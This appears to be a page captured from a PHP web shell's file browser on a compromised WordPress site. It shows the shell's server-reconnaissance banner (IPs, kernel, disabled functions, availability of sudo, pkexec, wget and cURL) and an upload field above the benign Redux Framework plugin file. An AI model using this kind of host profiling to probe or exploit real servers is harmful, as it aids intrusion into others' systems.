Server IP : 104.21.38.3 / Your IP : 172.70.142.172 Web Server : Apache System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64 User : www ( 1000) PHP Version : 7.4.33 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /www/wwwroot/savinassociates.com/wp-content/plugins/redux-framework/ |
Upload File : |
<?php // phpcs:ignore Squiz.Commenting.FileComment.Missing /** * Redux, a simple, truly extensible and fully responsive option framework * for WordPress themes and plugins. Developed with WordPress coding * standards and PHP best practices in mind. * * Plugin Name: Template Library and Redux Framework * Plugin URI: http://wordpress.org/plugins/redux-framework * GitHub URI: reduxframework/redux-framework * Description: Build better sites in WordPress fast! * Version: 4.3.14 * Requires at least: 4.0 * Requires PHP: 7.1 * Author: Extendify * Author URI: https://extendify.com/?utm_source=redux&utm_medium=plugins-page&utm_campaign=by * License: GPLv3 or later * License URI: http://www.gnu.org/licenses/gpl-3.0.txt * Text Domain: redux-framework * Provides: ReduxFramework * * @package ReduxFramework * @author Extendify * @license GNU General Public License, version 3 * @copyright 2012-2021 Redux.io */ // Exit if accessed directly. defined( 'ABSPATH' ) || exit; if ( ! defined( 'REDUX_PLUGIN_FILE' ) ) { define( 'REDUX_PLUGIN_FILE', __FILE__ ); } // Require the main plugin class. require_once plugin_dir_path( __FILE__ ) . 'class-redux-framework-plugin.php'; // Register hooks that are fired when the plugin is activated and deactivated, respectively. register_activation_hook( __FILE__, array( 'Redux_Framework_Plugin', 'activate' ) ); register_deactivation_hook( __FILE__, array( 'Redux_Framework_Plugin', 'deactivate' ) ); // Get plugin instance. Redux_Framework_Plugin::instance();